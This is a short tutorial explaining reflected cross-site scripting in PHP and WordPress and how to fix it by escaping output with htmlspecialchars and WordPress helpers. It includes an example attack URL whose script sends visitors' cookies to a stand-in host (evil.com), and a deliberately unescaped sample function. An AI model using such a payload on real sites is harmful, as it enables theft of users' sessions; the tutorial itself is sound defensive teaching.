How to remove the Cross-site Scripting in WordPress?

Recently I came across a query regarding “Cross-site Scripting”. So how do we solve it?

Firstly, in simple words, what is “Cross-site Scripting”?

Cross-site Scripting (XSS) is a type of attack carried out to compromise the users of a website rather than the server itself. Exploiting an XSS flaw lets an attacker inject client-side scripts into web pages viewed by those users.

An attacker can use a URL like this against your site: http://example.com/search.php?query=<script>document.InnerHTML += "<img src='http://evil.com/?cookie="+document.cookie+" />";</script> . If the search page echoes the query parameter back into the HTML unescaped, the script is reflected into the page and runs in the browser of anyone who opens that link.

To solve this issue, make sure that every parameter you receive and print back into the page goes through htmlspecialchars, which converts the special characters in the script above (such as < and >) into plain HTML entities, so the browser displays them as text instead of executing them:

// Escape at the point of output; ENT_QUOTES also escapes single quotes so the value is safe inside attributes too.
echo htmlspecialchars($_GET['query'] ?? '', ENT_QUOTES, 'UTF-8');
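To show the fix in context, here is an added example (not code from the original post) of a small search page with the unescaped output next to the escaped version; the helper names e(), render_vulnerable() and render_fixed() are hypothetical. In a WordPress theme or plugin the same job is done by the core helpers esc_html(), esc_attr() and esc_url().

```php
<?php
declare(strict_types=1);

// Escape a string for insertion into HTML text or a double-quoted attribute.
// ENT_QUOTES also escapes single quotes; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of silently returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: the query is echoed straight into the page, so any <script>
// in the parameter runs in the visitor's browser (reflected XSS).
function render_vulnerable(string $query): string
{
    return "<p>Results for: " . $query . "</p>";
}

// Fixed: the same value is escaped at the point of output, in every
// context it lands in (HTML body text and an attribute value).
function render_fixed(string $query): string
{
    $q = e($query);
    return "<p>Results for: {$q}</p>\n"
         . "<input type=\"search\" name=\"query\" value=\"{$q}\">";
}

// Constructed test input: a payload of the same shape as the one in the
// post; used when the script is run from the command line with no $_GET.
$query = $_GET['query'] ?? '<script>alert(document.cookie)</script>';

// Self-check: the fixed output must not contain a live <script> tag.
if (stripos(render_fixed($query), '<script') !== false) {
    throw new RuntimeException('escaping failed');
}

// In WordPress code, replace e() with esc_html() for body text,
// esc_attr() for attribute values and esc_url() for href/src values.
header('Content-Type: text/html; charset=UTF-8');
echo render_fixed($query), "\n";
```

Run it as `php search.php` to see the entity-encoded output, or serve it and open `search.php?query=<script>...` to confirm the payload is displayed as text rather than executed.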